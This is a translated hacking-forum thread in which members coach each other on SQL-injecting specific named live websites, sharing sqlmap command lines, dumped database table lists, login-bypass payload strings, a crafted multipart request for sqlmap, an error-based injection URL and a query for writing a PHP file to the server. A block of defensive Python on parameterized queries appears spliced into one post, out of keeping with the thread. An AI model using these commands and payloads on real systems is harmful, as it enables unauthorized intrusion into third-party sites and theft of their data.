Your questions about vulnerabilities.

Discussion in 'Vulnerabilities' started by +, 27 Apr 2015.

  1. grimnir (Members of Antichat)

  2. Muracha (Member)

    Please explain why it is like this.
    Why "5063" and "tviX"?

  3. grimnir (Members of Antichat)

  4. yarbabin (HACKIN YO KUT)

    That's how sqlmap prints it.
    You have a filter on SELECT, and not in the query to the database but in the POST/GET/COOKIE requests. You are unlikely to find a working vector; SELECT is needed everywhere.

  5. Muracha (Member)

    The last time I did this was about 7 years ago, out of necessity. Then I dropped it.
    I had to come back, and there is so much now.. vectors, new attack methods. New applications.
    I used to do everything by hand, and now pulling data out with a tool is no problem at all.
    Everything is so simplified and easy.

    On the whole, I've figured this out.
    But the question about the admin panel remains open.
    How do you get past the filtering if "Admin' --" is not accepted? And things like that.

  6. Muracha (Member)

    I can't pull out the list of tables.
    The query is the standard one
    root@localhost:~# sqlmap -u "http://www.kazanboats.ru/index.php?id=59" --tables -D etyle2_kazboats
    and this one
    root@localhost:~# sqlmap -u "http://www.kazanboats.ru/index.php?id=59" --tables -D --no-cast etyle2_kazboats

    The program goes through the tables from the wordlist and says they are not found.
    Is it really because select is being filtered?
    Code:
    root@localhost:~# sqlmap -u "http://www.kazanboats.ru/index.php?id=59" --tables  -D --no-cast etyle2_kazboats
    
      sqlmap/1.0-dev - automatic SQL injection and database takeover tool
      http://sqlmap.org
    
    [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
    
    [*] starting at 09:36:54
    
    [09:36:55] [INFO] resuming back-end DBMS 'mysql'
    [09:36:55] [INFO] testing connection to the target URL
    [09:36:55] [INFO] heuristics detected web page charset 'windows-1251'
    sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
    ---
    Place: GET
    Parameter: id
      Type: boolean-based blind
      Title: AND boolean-based blind - WHERE or HAVING clause
      Payload: id=59' AND 2198=2198 AND 'naaT'='naaT
    
      Type: AND/OR time-based blind
      Title: MySQL > 5.0.11 AND time-based blind
      Payload: id=59' AND SLEEP(5) AND 'GtmX'='GtmX
    ---
    [09:36:55] [INFO] the back-end DBMS is MySQL
    web application technology: Nginx, PHP 5.3.29
    back-end DBMS: MySQL 5.0.11
    [09:36:55] [INFO] fetching tables for database: '--no-cast'
    [09:36:55] [INFO] fetching number of tables for database '--no-cast'
    [09:36:55] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
    [09:36:55] [INFO] retrieved:
    [09:36:56] [WARNING] time-based comparison requires larger statistical model, please wait...........................
    [09:37:07] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors
    
    [09:37:07] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
    [09:37:07] [WARNING] unable to retrieve the number of tables for database '--no-cast'
    [09:37:07] [ERROR] unable to retrieve the table names for any database
    do you want to use common table existence check? [y/N/q] N
    No tables found
    [09:37:11] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/www.kazanboats.ru'
    
    [*] shutting down at 09:37:11
    
    
     
  7. yarbabin (HACKIN YO KUT)

    To output the DB name you don't need SELECT, just database() or schema(). But for outputting tables via blind, the syntax only works with SELECT. You are pulling information out of the database; how can you do that without a select? I tried to bypass it, no luck.

  8. Muracha (Member)

    Got it. Thanks a lot.
    Then is it possible with sqlmap to pull data or log in via http://www.kazanboats.ru/admin/login.php?
    The combination admin' : " or 1=1/* ' or 1=1--,
    ' or 1=1--
    " or 1=1--
    or 1=1--
    ' or 'a'='a
    " or "a"="a
    ') or ('a'='a

    For some reason they don't go through.
    Is this related to filtering or to an incorrectly constructed request?

  9. grimnir (Members of Antichat)

    Yes
    Code:
    -u "http://www.kazanboats.ru/admin/login.php" --eta --random-agent --threads=8   --level=5 --union-cols=1-66 --dbms="MySQL" --technique=EBU --current-db --data="auth_login=1*&auth_pass=g00dPa%24%24w0rD&auth_typ=on"
    Database: etyle2_kazboats
    [25 tables]
    +-------------------------+
    | kboats_adm_groups |
    | kboats_adm_log |
    | kboats_adm_users |
    | kboats_foto |
    | kboats_foto_category |
    | kboats_guestbook |
    | kboats_guestbook_conf |
    | kboats_guestbook_golos |
    | kboats_news |
    | kboats_news_banner |
    | kboats_news_cat |
    | kboats_news_comments |
    | kboats_news_conf |
    | kboats_news_users |
    | kboats_site_banner |
    | kboats_site_content |
    | kboats_site_menu |
    | kboats_site_modules |
    | kboats_site_option |
    | kboats_stock |
    | kboats_stock_brands |
    | kboats_stock_cat_option |
    | kboats_stock_category |
    | ksz_admin_menu |
    | ksz_info |
    +-------------------------+
     
  10. reuvenmatbil (New Member)

    When running sqlmap with the --os-shell parameter
    it prints
    [06:35:40] [INFO] calling Windows OS shell. To quit type 'x' or 'q' and press ENTER
    os-shell>

    How do I proceed from here to get access, what commands exist?
    I do have write permission

  11. man4747 (New Member)

  12. BigBear (Escrow Service; Staff Member, Guarantor - Escrow Service)

    select '<?php phpinfo(); ?>' into outfile '/[full_path]/x.php';
     
  13. Muracha (Member)

    Why, on a different version of the engine, does a request like
    Code:
    "-u "www.bogema-hotel.ru/access_admin.php" --eta --random-agent --threads=8 --level=5 --union-cols=1-66 --dbms="MySQL" --technique=EBU --current-db --data="auth_login=1*&auth_pass=g00dPa%24%24w0rD&auth_typ=on"
    stall on an identical request?
    Last time, on the previous site, I managed to pull out the login and password, but here there's some kind of block..
    Code:
    "
    sqlmap.py -u "http://www.bogema-hotel.ru" --eta --random-agent
    --threads=8   --level=5 --union-cols=1-66 --dbms="MySQL" --technique=EBU --curr
    ent-db  --column --data="auth_login=1*&auth_pass=g00dPa%24%24w0rD&auth_typ=on"
             _
    ___ ___| |_____ ___ ___  {1.0-dev-nongit-20150622}
    |_ -| . | |     | .'| . |
    |___|_  |_|_|_|_|__,|  _|
          |_|           |_|   http://sqlmap.org
    
    [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
    consent is illegal. It is the end user's responsibility to obey all applicable
    local, state and federal laws. Developers assume no liability and are not respon
    sible for any misuse or damage caused by this program
    
    [*] starting at 15:24:53
    
    [15:24:53] [INFO] fetched random HTTP User-Agent header from file '
    indows; U; Windows NT 6.1; zh-TW; rv:1.9.2.13) Gecko/20101203 AskTbPTV/3.9.1.140
    19 Firefox/3.6.13'
    custom injection marking character ('*') found in option '--data'. Do you want t
    o process it? [Y/n/q] n
    [15:24:56] [INFO] testing connection to the target URL
    [15:24:56] [INFO] heuristics detected web page charset 'windows-1251'
    [15:24:56] [INFO] testing if the target URL is stable. This can take a couple of
    seconds
    [15:24:57] [INFO] target URL is stable
    [15:24:57] [INFO] testing if POST parameter 'auth_login' is dynamic
    [15:24:57] [WARNING] POST parameter 'auth_login' does not appear dynamic
    [15:24:58] [WARNING] heuristic (basic) test shows that POST parameter 'auth_logi
    n' might not be injectable
    [15:24:58] [INFO] testing for SQL injection on POST parameter 'auth_login'
    [15:24:58] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
    [15:25:30] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (Gen
    eric comment)'
    [15:26:02] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MyS
    QL comment)'
    [15:26:34] [INFO] testing 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDE
    R BY or GROUP BY clause'
    [15:27:07] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER
    BY or GROUP BY clause (MAKE_SET)'
    [15:27:38] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER
    BY or GROUP BY clause (ELT)'
    [15:28:11] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER
    BY or GROUP BY clause (bool*int)'
    [15:28:43] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
    
    [15:28:43] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace
    (original value)'
    [15:28:44] [INFO] testing 'MySQL < 5.0 boolean-based blind - Parameter replace'
    [15:28:44] [INFO] testing 'MySQL < 5.0 boolean-based blind - Parameter replace (
    original value)'
    [15:28:45] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_S
    ET)'
    [15:28:46] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_S
    ET - original value)'
    [15:28:46] [INFO] testing 'MySQL boolean-based blind - Parameter replace (ELT)'
    [15:28:47] [INFO] testing 'MySQL boolean-based blind - Parameter replace (ELT -
    original value)'
    [15:28:47] [INFO] testing 'MySQL boolean-based blind - Parameter replace (bool*i
    nt)'
    [15:28:48] [INFO] testing 'MySQL boolean-based blind - Parameter replace (bool*i
    nt - original value)'
    [15:28:48] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY
    clause'
    [15:28:49] [WARNING] reflective value(s) found and filtering out
    [15:28:50] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY
    clause (original value)'
    [15:28:51] [INFO] testing 'MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY
    clause'
    [15:28:52] [INFO] testing 'MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY
    clause (original value)'
    [15:28:53] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Stacked queries'
    [15:29:25] [INFO] testing 'MySQL < 5.0 boolean-based blind - Stacked queries'
    [15:29:57] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER B
    Y or GROUP BY clause'
    [15:30:06] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER B
    Y or GROUP BY clause (EXTRACTVALUE)'
    [15:30:15] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER B
    Y or GROUP BY clause (UPDATEXML)'
    [15:30:24] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER B
    Y or GROUP BY clause (BIGINT UNSIGNED)'
    [15:30:34] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER B
    Y or GROUP BY clause'
    [15:30:43] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACT
    VALUE)'
    [15:30:52] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
    [15:30:52] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACT
    VALUE)'
    [15:30:53] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEX
    ML)'
    [15:30:53] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT
    UNSIGNED)'
    [15:30:53] [INFO] testing 'MySQL >= 5.0 error-based - ORDER BY, GROUP BY clause'
    
    [15:30:53] [INFO] testing 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause
    (EXTRACTVALUE)'
    [15:30:54] [INFO] testing 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause
    (UPDATEXML)'
    [15:30:54] [INFO] testing 'MySQL >= 5.5 error-based - ORDER BY, GROUP BY clause
    (BIGINT UNSIGNED)'
    [15:30:54] [INFO] testing 'MySQL >= 4.1 error-based - ORDER BY, GROUP BY clause'
    
    [15:30:55] [INFO] testing 'Generic UNION query (NULL) - 1 to 66 columns (custom)
    '"
     
    #253 Muracha, 23 Jun 2015
    Last edited: 23 Jun 2015
  14. yarbabin (HACKIN YO KUT)

    So you need to find the vector manually and see what's wrong

    Code:
    http://www.arbet.am/search.php?CategoryID=1|extractvalue(1,concat(0x3a,version()))
     
  15. grimnir (Members of Antichat)

    Because the request there is different, multipart
    create a file request.txt and put this in it
    Code:
    POST /access_admin.php HTTP/1.1
    Content-Length: 586
    Content-Type: multipart/form-data; boundary=----Exploit_Code
    Cookie: PHPSESSID=e2fa5bb7d6518aa7b7f3a206febdcff0
    Host: www.bogema-hotel.ru
    Connection: Keep-alive
    Accept-Encoding: gzip,deflate
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
    Accept: */*
    
    ------Exploit_Code
    Content-Disposition: form-data; name="authorize"
    
    1
    ------Exploit_Code
    Content-Disposition: form-data; name="login"
    
    1*
    ------Exploit_Code
    Content-Disposition: form-data; name="password"
    
    g00dPa$$w0rD
    ------Exploit_Code--
    then python.exe "путь_до\sql\sqlmap.py" -r "путь_до\sql\request.txt" --eta --random-agent --threads=10 --level=5 --union-cols=1-66 --dbms="MySQL" --technique=E --dbs
    Database: ironlogix_bgmh
    [24 tables]
    +------------------------------+
    | SS_aux |
    | SS_brand |
    | SS_categories |
    | SS_category_product |
    | SS_currency_types |
    | SS_customers |
    | SS_manager |
    | SS_manager_dany |
    | SS_news |
    | SS_order_status |
    | SS_ordered_carts |
    | SS_orders |
    | SS_pages |
    | SS_payment |
    | SS_payoption |
    | SS_product_options |
    | SS_product_options_values |
    | SS_products |
    | SS_products_opt_val_variants |
    | SS_review |
    | SS_share |
    | SS_special_offers |
    | SS_tags |
    | SS_thumb |
    +------------------------------+
     
  16. Muracha (Member)

    There is a forum http://forum.chindirchero.ru/
    In the update field at "http://forum.chindirchero.ru/upgrade/"
    If you enter \1\ and \1\ an error appears:
    Code:
    SELECT m.*, g.* FROM ibf_members m LEFT JOIN ibf_groups g ON (g.g_id=m.mgroup) WHERE LOWER(name)='\1\'
    
    Сообщение сервера: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''\1\'' at line 1
    Код ошибки: 1064
    Время: Wednesday 24th o June 2015 12:04:17 PM
    
    Can the data be pulled out with sqlmap?

    When composing and adjusting the request, sqlmap complained about the following and reported 404
    Maybe I composed the request incorrectly?

    Code:
    indows; U; Windows NT 6.0; en-US; rv:1.9.2.4) Gecko/20100527 Firefox/3.6.4 (.NET
     CLR 3.5.30729)'
    Multipart-like data found in POST data. Do you want to process it? [Y/n/q] Y
    [13:11:29] [INFO] testing connection to the target URL
    [13:11:29] [CRITICAL] page not found (404)
    it is not recommended to continue in this kind of cases. Do you want to quit and
     make sure that everything is set up properly? [Y/n] Y
    [13:11:30] [WARNING] HTTP error codes detected during run:
    404 (Not Found) - 1 times
    
    Code:
    POST /index.php HTTP/1.1
    Content-Length: 586
    Content-Type: multipart/form-data; boundary=----Exploit_Code
    Cookie: PHPSESSID=e2fa5bb7d6518aa7b7f3a206febdcff0
    Host: www.forum.chindirchero.ru/upgrade/index.php
    Connection: Keep-alive
    Accept-Encoding: gzip,deflate
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
    Accept: */*
    
    ------Exploit_Code
    Content-Disposition: form-data; name="username"
    
    \1\
    ------Exploit_Code
    Content-Disposition: form-data; name="username"
    
    \1\
    ------Exploit_Code
    Content-Disposition: form-data; name="password"
    
    g00dPa$$w0rD
    ------Exploit_Code--
     
  17. BigBear (Escrow Service; Staff Member, Guarantor - Escrow Service)

    Well, let's look at the query:

    Code:
    SELECT m.*, g.* FROM ibf_members m LEFT JOIN ibf_groups g ON (g.g_id=m.mgroup) WHERE LOWER(name)='\1\'

    It complains about an unclosed quote, because the backslash escapes the quote that is inserted by default.

    Can you push your own payload through? Theoretically yes, if:

    1) You have a second parameter in the query that we can control. That is, with the first parameter we escape the quote, turning the rest of the query into a string value, and with the second parameter we pass in our payload.

    Only one variable takes part in your query, so this is not our case.

    So we need to try to extend the query within a single variable.

    But for that we need to close the first quote.

    2) A mandatory condition is that the quote is not transformed but passes through untouched.

    Let's check:

    123'\

    Response
    Code:
    SELECT m.*, g.* FROM ibf_members m LEFT JOIN ibf_groups g ON (g.g_id=m.mgroup) WHERE LOWER(name)='123&#39;\'
    As we can see, the quote gets encoded. A dead end.

    The most you can get from this bug is to learn the current table prefix.
     
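To make BigBear's analysis concrete, here is an added example that is not code from the thread or from the forum software. It models the observed encoding (the quote becomes &#39;, the backslash passes through; an assumption inferred from the two responses quoted above), scans the resulting literal with MySQL's quoting rules to show which inputs leave it unterminated, and contrasts that with a parameterized query (run on sqlite3 so it works offline); the table names, rows and probe strings are constructed.

```python
import sqlite3

# Model of the behaviour seen in the thread (an assumption, not the forum's code):
# the single quote is HTML-encoded to &#39; while the backslash passes through untouched.
def app_encode(value: str) -> str:
    return value.replace("'", "&#39;")

def build_query(username: str) -> str:
    """Rebuild the vulnerable query from the thread with the app's encoding applied."""
    return ("SELECT m.*, g.* FROM ibf_members m LEFT JOIN ibf_groups g "
            "ON (g.g_id=m.mgroup) WHERE LOWER(name)='" + app_encode(username) + "'")

def scan_literal(sql: str, start: int) -> tuple:
    """Walk a MySQL single-quoted literal whose opening quote is at sql[start].

    MySQL rules: a backslash escapes the next character and '' is an escaped quote.
    Returns (terminated, decoded_literal).
    """
    i, out = start + 1, []
    while i < len(sql):
        c = sql[i]
        if c == "\\" and i + 1 < len(sql):          # backslash escape, e.g. \' or \1
            out.append(sql[i + 1])
            i += 2
        elif c == "'" and sql[i + 1:i + 2] == "'":  # doubled quote inside the literal
            out.append("'")
            i += 2
        elif c == "'":                              # real closing quote
            return True, "".join(out)
        else:
            out.append(c)
            i += 1
    return False, "".join(out)                      # ran off the end: syntax error

def analyse(username: str) -> dict:
    """Report whether a given input leaves the name literal unterminated."""
    sql = build_query(username)
    start = sql.index("LOWER(name)='") + len("LOWER(name)=")
    terminated, literal = scan_literal(sql, start)
    return {"sql": sql, "terminated": terminated, "literal": literal}

def demo_db() -> sqlite3.Connection:
    """Constructed in-memory schema mirroring the two tables named in the query."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE ibf_groups(g_id INTEGER, g_title TEXT);
        CREATE TABLE ibf_members(name TEXT, mgroup INTEGER);
        INSERT INTO ibf_groups VALUES (4, 'Administrators');
        INSERT INTO ibf_members VALUES ('admin', 4), ('\\1\\', 4);
    """)
    return conn

def lookup_member_safe(conn: sqlite3.Connection, username: str) -> list:
    """Hardened form: the value is bound as a parameter, never spliced into SQL text,
    so neither a backslash nor a quote can change the statement."""
    cur = conn.execute(
        "SELECT m.name, g.g_title FROM ibf_members m LEFT JOIN ibf_groups g "
        "ON (g.g_id=m.mgroup) WHERE LOWER(m.name)=?", (username.lower(),))
    return cur.fetchall()

if __name__ == "__main__":
    for probe in ("\\1\\", "123'\\", "it's"):
        r = analyse(probe)
        print(repr(probe), "terminated:", r["terminated"], "literal:", repr(r["literal"]))
    print(lookup_member_safe(demo_db(), "\\1\\"))
```

Note the third probe: even a harmless name like it's is stored as it&#39;s by this encoding, a data-corruption side effect that parameter binding also removes.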
  18. yarbabin (HACKIN YO KUT)

    I figured out what the problem is.
    Code:
    SELECT manager, password from SS_manager
    NULL. Because there are no records, it's impossible to log in even after bypassing the authorization.

  19. randman (Members of Antichat)

    Really? As kingbeef said, you can use error-based vectors. With them you can see the records with your own eyes.

    Bypassing authorization with substitutions like ' or 1=1 # doesn't work because only the login field takes part in the query. The password match is checked by the PHP script. Options:
    1. Output the records and enter them into the form.
    2. If there really are no records, or they contain uncrackable hashes, substitute your own with UNION and enter the corresponding password in the password field.

  20. grimnir (Members of Antichat)

    Did I understand correctly that this will only work if the appropriate privileges are present?
